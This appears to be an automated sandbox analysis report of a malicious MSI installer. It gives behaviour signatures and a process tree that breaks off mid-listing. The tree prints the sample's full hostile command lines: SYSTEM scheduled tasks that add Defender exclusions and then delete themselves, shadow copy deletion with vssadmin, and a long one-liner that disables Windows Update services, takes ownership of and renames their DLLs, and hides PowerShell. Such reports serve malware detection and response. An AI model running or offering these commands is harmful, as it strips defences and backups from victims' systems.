Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20260513-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20260513-enlocale:en-usos:windows10-2004-x64systemwindows
  • submitted
    31/07/2026, 04:38

General

  • Target
    install_mal007.msi
  • Size 5.9MB
  • Sample260731-e9e22acg34
  • SHA256 2c1e750f0de09fc53ad94a1f408ecaf598f1d356869d15ec33bb71bcd87b83ba
  • MD5 SHA1 SHA512 SSDEEP TLSH

Malware Config

Signatures

  • UAC bypass 3 TTPs 1 IoCs
  • Windows security bypass 2 TTPs 14 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Drops file in Drivers directory 1 IoCs
  • Modifies RDP port number used by Windows 1 TTPs
  • Possible privilege escalation attempt 23 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Disables service(s) 3 TTPs
  • Executes dropped EXE 5 IoCs
  • Loads dropped DLL 6 IoCs
  • Modifies file permissions 1 TTPs 23 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Badlisted process makes network request 8 IoCs

    Network request originating from process or tool commonly abused by malware.

  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Indicator Removal: Clear Persistence 1 TTPs 10 IoCs

    Clear artifacts associated with previously established persistence like scheduletasks on a host.

  • Drops file in System32 directory 13 IoCs
  • Drops file in Program Files directory 18 IoCs
  • Drops file in Windows directory 9 IoCs
  • Launches sc.exe 8 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Installer Packages 2 TTPs 1 IoCs
  • Event Triggered Execution: Screensaver 1 TTPs 3 IoCs

    Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.

  • Executes a command shell one-liner 1 TTPs 27 IoCs

    Execution of a cmd.exe one-liner (/c "close" or /k "keep") is a common script/loader stage.

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 5 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies Control Panel 4 IoCs
  • Modifies data under HKEY_USERS 9 IoCs
  • Modifies registry class 23 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 10 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 1 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\system32\msiexec.exe
    msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\install_mal007.msi
    1⤵
    • Enumerates connected drives
    • Event Triggered Execution: Installer Packages
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:2368
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Drops file in Windows directory
    • Modifies data under HKEY_USERS
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2516
    • C:\Windows\system32\srtasks.exe
      C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:3820
    • C:\Windows\System32\MsiExec.exe
      C:\Windows\System32\MsiExec.exe -Embedding 3FFEDC1155C6AA7891AA99D51F49577D E Global\MSI0000
      2⤵
      • Loads dropped DLL
      • Badlisted process makes network request
      • Drops file in System32 directory
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      PID:676
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Checks SCSI registry key(s)
    • Suspicious use of AdjustPrivilegeToken
    PID:2340
  • C:\Users\Public\kC79lR\W4N9eg.exe
    C:\Users\Public\kC79lR\W4N9eg.exe
    1⤵
    • Checks computer location settings
    • Executes dropped EXE
    • Loads dropped DLL
    • Adds Run key to start application
    • Drops file in System32 directory
    • Drops file in Program Files directory
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:648
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Public\kC79lR\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
      2⤵
      • Indicator Removal: Clear Persistence
      • Suspicious use of WriteProcessMemory
      PID:4432
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Public\kC79lR\" /t REG_DWORD /d 0 /f"
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:1120
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /Run /TN "Task1"
        3⤵
          PID:1684
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Delete /TN "Task1" /F
          3⤵
            PID:3948
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
          2⤵
          • Indicator Removal: Clear Persistence
          • Suspicious use of WriteProcessMemory
          PID:4112
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
            3⤵
            • Scheduled Task/Job: Scheduled Task
            PID:1888
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Run /TN "Task1"
            3⤵
              PID:3032
            • C:\Windows\system32\schtasks.exe
              SCHTASKS /Delete /TN "Task1" /F
              3⤵
                PID:772
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
              2⤵
              • Indicator Removal: Clear Persistence
              • Suspicious use of WriteProcessMemory
              PID:3936
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
                3⤵
                • Scheduled Task/Job: Scheduled Task
                PID:3364
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Run /TN "Task1"
                3⤵
                  PID:1780
                • C:\Windows\system32\schtasks.exe
                  SCHTASKS /Delete /TN "Task1" /F
                  3⤵
                    PID:916
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                  2⤵
                  • Indicator Removal: Clear Persistence
                  • Suspicious use of WriteProcessMemory
                  PID:2084
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
                    3⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:1928
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Run /TN "Task1"
                    3⤵
                      PID:4388
                    • C:\Windows\system32\schtasks.exe
                      SCHTASKS /Delete /TN "Task1" /F
                      3⤵
                        PID:568
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                      2⤵
                      • Indicator Removal: Clear Persistence
                      • Suspicious use of WriteProcessMemory
                      PID:3852
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Admin\Documents\" /t REG_DWORD /d 0 /f"
                        3⤵
                        • Scheduled Task/Job: Scheduled Task
                        PID:1768
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Run /TN "Task1"
                        3⤵
                          PID:752
                        • C:\Windows\system32\schtasks.exe
                          SCHTASKS /Delete /TN "Task1" /F
                          3⤵
                            PID:4956
                        • C:\Program Files (x86)\lDQbO9\lDQbO9.exe
                          "C:\Program Files (x86)\lDQbO9\lDQbO9.exe"
                          2⤵
                          • UAC bypass
                          • Drops file in Drivers directory
                          • Checks computer location settings
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Adds Run key to start application
                          • Drops file in Program Files directory
                          • Event Triggered Execution: Screensaver
                          • Checks processor information in registry
                          • Modifies Control Panel
                          • Suspicious use of WriteProcessMemory
                          • System policy modification
                          PID:4252
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c vssadmin delete shadows /all /quiet
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            PID:2796
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c icacls "C:\Program Files (x86)\lDQbO9" /inheritance:r
                            3⤵
                            • Executes a command shell one-liner
                            • Suspicious use of WriteProcessMemory
                            PID:4596
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls "C:\Program Files (x86)\lDQbO9" /inheritance:r
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              • System Location Discovery: System Language Discovery
                              PID:1364
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c echo.>c:\xxxx.ini
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            PID:2860
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" cmd.exe /q /c "@echo off & (for %i in (wuauserv UsoSvc uhssvc WaaSMedicSvc) do ( net stop %i >nul 2>&1 & sc config %i start= disabled >nul 2>&1 & sc failure %i reset= 0 actions= "" >nul 2>&1 )) & (for %i in (WaaSMedicSvc wuaueng) do ( takeown /f C:\Windows\System32\%i.dll >nul 2>&1 & icacls C:\Windows\System32\%i.dll /grant *S-1-1-0:F >nul 2>&1 & rename C:\Windows\System32\%i.dll %i_BAK.dll >nul 2>&1 & icacls C:\Windows\System32\%i_BAK.dll /setowner "NT SERVICE\TrustedInstaller" >nul 2>&1 & icacls C:\Windows\System32\%i_BAK.dll /remove *S-1-1-0 >nul 2>&1 )) & reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f >nul 2>&1 & reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f >nul 2>&1 & reg add "HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU" /v NoAutoUpdate /t REG_DWORD /d 1 /f >nul 2>&1 & erase /f /s /q c:\windows\softwaredistribution\*.* >nul 2>&1 & rmdir /s /q c:\windows\softwaredistribution >nul 2>&1 & powershell -NoProfile -WindowStyle Hidden -Command "& {Get-ScheduledTask -TaskPath '\Microsoft\Windows\InstallService\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateOrchestrator\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateAssistant\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WaaSMedic\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue;}" >nul 2>&1"
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:4196
                            • C:\Windows\SysWOW64\net.exe
                              net stop wuauserv
                              4⤵
                              • System Location Discovery: System Language Discovery
                              • Suspicious use of WriteProcessMemory
                              PID:2780
                              • C:\Windows\SysWOW64\net1.exe
                                C:\Windows\system32\net1 stop wuauserv
                                5⤵
                                • System Location Discovery: System Language Discovery
                                PID:2808
                            • C:\Windows\SysWOW64\sc.exe
                              sc config wuauserv start= disabled
                              4⤵
                              • Launches sc.exe
                              • System Location Discovery: System Language Discovery
                              PID:4884
                            • C:\Windows\SysWOW64\sc.exe
                              sc failure wuauserv reset= 0 actions= ""
                              4⤵
                              • Launches sc.exe
                              • System Location Discovery: System Language Discovery
                              PID:220
                            • C:\Windows\SysWOW64\net.exe
                              net stop UsoSvc
                              4⤵
                              • System Location Discovery: System Language Discovery
                              PID:1192
                              • C:\Windows\SysWOW64\net1.exe
                                C:\Windows\system32\net1 stop UsoSvc
                                5⤵
                                • System Location Discovery: System Language Discovery
                                PID:4312
                            • C:\Windows\SysWOW64\sc.exe
                              sc config UsoSvc start= disabled
                              4⤵
                              • Launches sc.exe
                              • System Location Discovery: System Language Discovery
                              PID:2956
                            • C:\Windows\SysWOW64\sc.exe
                              sc failure UsoSvc reset= 0 actions= ""
                              4⤵
                              • Launches sc.exe
                              PID:3244
                            • C:\Windows\SysWOW64\net.exe
                              net stop uhssvc
                              4⤵
                              • System Location Discovery: System Language Discovery
                              PID:556
                              • C:\Windows\SysWOW64\net1.exe
                                C:\Windows\system32\net1 stop uhssvc
                                5⤵
                                • System Location Discovery: System Language Discovery
                                PID:4888
                            • C:\Windows\SysWOW64\sc.exe
                              sc config uhssvc start= disabled
                              4⤵
                              • Launches sc.exe
                              • System Location Discovery: System Language Discovery
                              PID:1228
                            • C:\Windows\SysWOW64\sc.exe
                              sc failure uhssvc reset= 0 actions= ""
                              4⤵
                              • Launches sc.exe
                              • System Location Discovery: System Language Discovery
                              PID:4120
                            • C:\Windows\SysWOW64\net.exe
                              net stop WaaSMedicSvc
                              4⤵
                              • System Location Discovery: System Language Discovery
                              PID:4440
                              • C:\Windows\SysWOW64\net1.exe
                                C:\Windows\system32\net1 stop WaaSMedicSvc
                                5⤵
                                • System Location Discovery: System Language Discovery
                                PID:1336
                            • C:\Windows\SysWOW64\sc.exe
                              sc config WaaSMedicSvc start= disabled
                              4⤵
                              • Launches sc.exe
                              • System Location Discovery: System Language Discovery
                              PID:4548
                            • C:\Windows\SysWOW64\sc.exe
                              sc failure WaaSMedicSvc reset= 0 actions= ""
                              4⤵
                              • Launches sc.exe
                              • System Location Discovery: System Language Discovery
                              PID:2808
                            • C:\Windows\SysWOW64\takeown.exe
                              takeown /f C:\Windows\System32\WaaSMedicSvc.dll
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              PID:3944
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              PID:2616
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls C:\Windows\System32\WaaSMedicSvc_BAK.dll /setowner "NT SERVICE\TrustedInstaller"
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              • System Location Discovery: System Language Discovery
                              PID:4672
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls C:\Windows\System32\WaaSMedicSvc_BAK.dll /remove *S-1-1-0
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              • System Location Discovery: System Language Discovery
                              PID:1888
                            • C:\Windows\SysWOW64\takeown.exe
                              takeown /f C:\Windows\System32\wuaueng.dll
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              • System Location Discovery: System Language Discovery
                              PID:2576
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls C:\Windows\System32\wuaueng.dll /grant *S-1-1-0:F
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              PID:2220
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls C:\Windows\System32\wuaueng_BAK.dll /setowner "NT SERVICE\TrustedInstaller"
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              • System Location Discovery: System Language Discovery
                              PID:3296
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls C:\Windows\System32\wuaueng_BAK.dll /remove *S-1-1-0
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              • System Location Discovery: System Language Discovery
                              PID:2352
                            • C:\Windows\SysWOW64\reg.exe
                              reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f
                              4⤵
                              • System Location Discovery: System Language Discovery
                              PID:2732
                            • C:\Windows\SysWOW64\reg.exe
                              reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f
                              4⤵
                              • System Location Discovery: System Language Discovery
                              PID:4488
                            • C:\Windows\SysWOW64\reg.exe
                              reg add "HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU" /v NoAutoUpdate /t REG_DWORD /d 1 /f
                              4⤵
                              • System Location Discovery: System Language Discovery
                              PID:1364
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              powershell -NoProfile -WindowStyle Hidden -Command "& {Get-ScheduledTask -TaskPath '\Microsoft\Windows\InstallService\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateOrchestrator\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateAssistant\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WaaSMedic\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue;}"
                              4⤵
                              • Command and Scripting Interpreter: PowerShell
                              • System Location Discovery: System Language Discovery
                              PID:1984
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\lDQbO9\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                            3⤵
                            • Indicator Removal: Clear Persistence
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:2080
                            • C:\Windows\SysWOW64\schtasks.exe
                              SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\lDQbO9\" /t REG_DWORD /d 0 /f"
                              4⤵
                              • System Location Discovery: System Language Discovery
                              • Scheduled Task/Job: Scheduled Task
                              PID:1720
                            • C:\Windows\SysWOW64\schtasks.exe
                              SCHTASKS /Run /TN "Task1"
                              4⤵
                              • System Location Discovery: System Language Discovery
                              PID:2712
                            • C:\Windows\SysWOW64\schtasks.exe
                              SCHTASKS /Delete /TN "Task1" /F
                              4⤵
                              • System Location Discovery: System Language Discovery
                              PID:632
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c echo.>c:\xxxx.ini
                            3⤵
                            • Executes a command shell one-liner
                            PID:3284
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c echo.>c:\xxxx.ini
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            PID:3900
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                            3⤵
                            • Indicator Removal: Clear Persistence
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:3876
                            • C:\Windows\SysWOW64\schtasks.exe
                              SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
                              4⤵
                              • System Location Discovery: System Language Discovery
                              • Scheduled Task/Job: Scheduled Task
                              PID:3224
                            • C:\Windows\SysWOW64\schtasks.exe
                              SCHTASKS /Run /TN "Task1"
                              4⤵
                              • System Location Discovery: System Language Discovery
                              PID:1748
                            • C:\Windows\SysWOW64\schtasks.exe
                              SCHTASKS /Delete /TN "Task1" /F
                              4⤵
                              • System Location Discovery: System Language Discovery
                              PID:4976
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                            3⤵
                            • Indicator Removal: Clear Persistence
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:1304
                            • C:\Windows\SysWOW64\schtasks.exe
                              SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
                              4⤵
                              • Scheduled Task/Job: Scheduled Task
                              PID:2528
                            • C:\Windows\SysWOW64\schtasks.exe
                              SCHTASKS /Run /TN "Task1"
                              4⤵
                              • System Location Discovery: System Language Discovery
                              PID:2580
                            • C:\Windows\SysWOW64\schtasks.exe
                              SCHTASKS /Delete /TN "Task1" /F
                              4⤵
                                PID:4916
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd.exe /c icacls "C:\Program Files (x86)\lDQbO9" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                              3⤵
                              • Executes a command shell one-liner
                              • Suspicious use of WriteProcessMemory
                              PID:888
                              • C:\Windows\SysWOW64\icacls.exe
                                icacls "C:\Program Files (x86)\lDQbO9" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                4⤵
                                • Possible privilege escalation attempt
                                • Modifies file permissions
                                • System Location Discovery: System Language Discovery
                                PID:4444
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                              3⤵
                              • Indicator Removal: Clear Persistence
                              • Suspicious use of WriteProcessMemory
                              PID:3700
                              • C:\Windows\SysWOW64\schtasks.exe
                                SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
                                4⤵
                                • System Location Discovery: System Language Discovery
                                • Scheduled Task/Job: Scheduled Task
                                PID:3644
                              • C:\Windows\SysWOW64\schtasks.exe
                                SCHTASKS /Run /TN "Task1"
                                4⤵
                                  PID:676
                                • C:\Windows\SysWOW64\schtasks.exe
                                  SCHTASKS /Delete /TN "Task1" /F
                                  4⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:4356
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd.exe /c icacls "C:\Program Files (x86)\lDQbO9" /grant:r Users:(OI)(CI)(RX) /deny Users:(OI)(CI)(DC)
                                3⤵
                                • Executes a command shell one-liner
                                • System Location Discovery: System Language Discovery
                                • Suspicious use of WriteProcessMemory
                                PID:4956
                                • C:\Windows\SysWOW64\icacls.exe
                                  icacls "C:\Program Files (x86)\lDQbO9" /grant:r Users:(OI)(CI)(RX) /deny Users:(OI)(CI)(DC)
                                  4⤵
                                  • Possible privilege escalation attempt
                                  • Modifies file permissions
                                  • System Location Discovery: System Language Discovery
                                  PID:1884
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd.exe /c icacls "C:\Program Files (x86)\lDQbO9\lDQbO9.exe" /inheritance:r
                                3⤵
                                • Executes a command shell one-liner
                                • System Location Discovery: System Language Discovery
                                • Suspicious use of WriteProcessMemory
                                PID:4828
                                • C:\Windows\SysWOW64\icacls.exe
                                  icacls "C:\Program Files (x86)\lDQbO9\lDQbO9.exe" /inheritance:r
                                  4⤵
                                  • Possible privilege escalation attempt
                                  • Modifies file permissions
                                  • System Location Discovery: System Language Discovery
                                  PID:3312
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                3⤵
                                • Indicator Removal: Clear Persistence
                                • System Location Discovery: System Language Discovery
                                • Suspicious use of WriteProcessMemory
                                PID:3820
                                • C:\Windows\SysWOW64\schtasks.exe
                                  SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Admin\Documents\" /t REG_DWORD /d 0 /f"
                                  4⤵
                                  • Scheduled Task/Job: Scheduled Task
                                  PID:4548
                                • C:\Windows\SysWOW64\schtasks.exe
                                  SCHTASKS /Run /TN "Task1"
                                  4⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:1992
                                • C:\Windows\SysWOW64\schtasks.exe
                                  SCHTASKS /Delete /TN "Task1" /F
